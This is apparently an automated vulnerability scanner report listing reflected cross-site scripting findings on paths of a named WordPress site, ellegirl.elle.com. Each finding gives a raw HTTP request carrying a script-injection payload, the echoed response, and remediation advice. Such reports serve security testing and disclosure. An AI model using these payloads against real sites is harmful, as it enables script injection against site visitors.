Expires: Sat, 17 Sep 2011 16:34:57 GMT
Date: Sat, 17 Sep 2011 16:34:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themesf8d6c</script><script>alert(1)</script>eb7d7690424/thesis/custom/js/jquery.cycle.all.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.hr
...[SNIP]...
4.177. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52609</script><script>alert(1)</script>8c5d8c0aa81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis52609</script><script>alert(1)</script>8c5d8c0aa81/custom/js/jquery.cycle.all.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:28 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30499
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:32 GMT
Date: Sat, 17 Sep 2011 16:36:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis52609</script><script>alert(1)</script>8c5d8c0aa81/custom/js/jquery.cycle.all.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;


...[SNIP]...
4.178. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1df6a</script><script>alert(1)</script>006971724a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom1df6a</script><script>alert(1)</script>006971724a2/js/jquery.cycle.all.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:38:03 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30499
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:38:07 GMT
Date: Sat, 17 Sep 2011 16:38:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom1df6a</script><script>alert(1)</script>006971724a2/js/jquery.cycle.all.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/******
...[SNIP]...
4.179. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1335</script><script>alert(1)</script>b38d36f6b8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/jsa1335</script><script>alert(1)</script>b38d36f6b8/jquery.cycle.all.min.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30498
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:26 GMT
Date: Sat, 17 Sep 2011 16:39:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/jsa1335</script><script>alert(1)</script>b38d36f6b8/jquery.cycle.all.min.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/*********
...[SNIP]...
4.180. http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c8b9</script><script>alert(1)</script>0bd3f92252f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js5c8b9</script><script>alert(1)</script>0bd3f92252f?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:40:07 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30499
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:40:08 GMT
Date: Sat, 17 Sep 2011 16:40:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
le;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js5c8b9</script><script>alert(1)</script>0bd3f92252f?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHI
...[SNIP]...
4.181. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/layout.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92cc4</script><script>alert(1)</script>20008c6dc76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content92cc4</script><script>alert(1)</script>20008c6dc76/themes/thesis/custom/layout.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:03 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:08 GMT
Date: Sat, 17 Sep 2011 16:33:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content92cc4</script><script>alert(1)</script>20008c6dc76/themes/thesis/custom/layout.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;
...[SNIP]...
4.182. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/layout.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3066f</script><script>alert(1)</script>b258b28a4cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes3066f</script><script>alert(1)</script>b258b28a4cc/thesis/custom/layout.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:46 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:50 GMT
Date: Sat, 17 Sep 2011 16:34:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes3066f</script><script>alert(1)</script>b258b28a4cc/thesis/custom/layout.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/**
...[SNIP]...
4.183. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/layout.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdcad</script><script>alert(1)</script>1a581de9ae9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesiscdcad</script><script>alert(1)</script>1a581de9ae9/custom/layout.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:23 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:27 GMT
Date: Sat, 17 Sep 2011 16:36:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
rop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesiscdcad</script><script>alert(1)</script>1a581de9ae9/custom/layout.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/*********
...[SNIP]...
4.184. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/layout.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b73</script><script>alert(1)</script>b160c8e3e86 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom72b73</script><script>alert(1)</script>b160c8e3e86/layout.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:38:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:38:04 GMT
Date: Sat, 17 Sep 2011 16:38:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
'';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom72b73</script><script>alert(1)</script>b160c8e3e86/layout.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO
...[SNIP]...
4.185. http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/custom/layout.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af5ad</script><script>alert(1)</script>8c67236ce5c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesis/custom/layout.cssaf5ad</script><script>alert(1)</script>8c67236ce5c?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:14 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30489
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:17 GMT
Date: Sat, 17 Sep 2011 16:39:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themes/thesis/custom/layout.cssaf5ad</script><script>alert(1)</script>8c67236ce5c?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER
...[SNIP]...
4.186. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b706</script><script>alert(1)</script>e5c7538940c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content9b706</script><script>alert(1)</script>e5c7538940c/themes/thesis/style.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:32:45 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30481
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:32:53 GMT
Date: Sat, 17 Sep 2011 16:32:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content9b706</script><script>alert(1)</script>e5c7538940c/themes/thesis/style.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/***
...[SNIP]...
4.187. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9a9c</script><script>alert(1)</script>fbf07435eb1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesc9a9c</script><script>alert(1)</script>fbf07435eb1/thesis/style.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:30 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30481
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:33 GMT
Date: Sat, 17 Sep 2011 16:34:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/themesc9a9c</script><script>alert(1)</script>fbf07435eb1/thesis/style.css?041911-171911';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/**********
...[SNIP]...
4.188. http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/themes/thesis/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6a72</script><script>alert(1)</script>beb069e8af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/thesise6a72</script><script>alert(1)</script>beb069e8af1/style.css?041911-171911 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
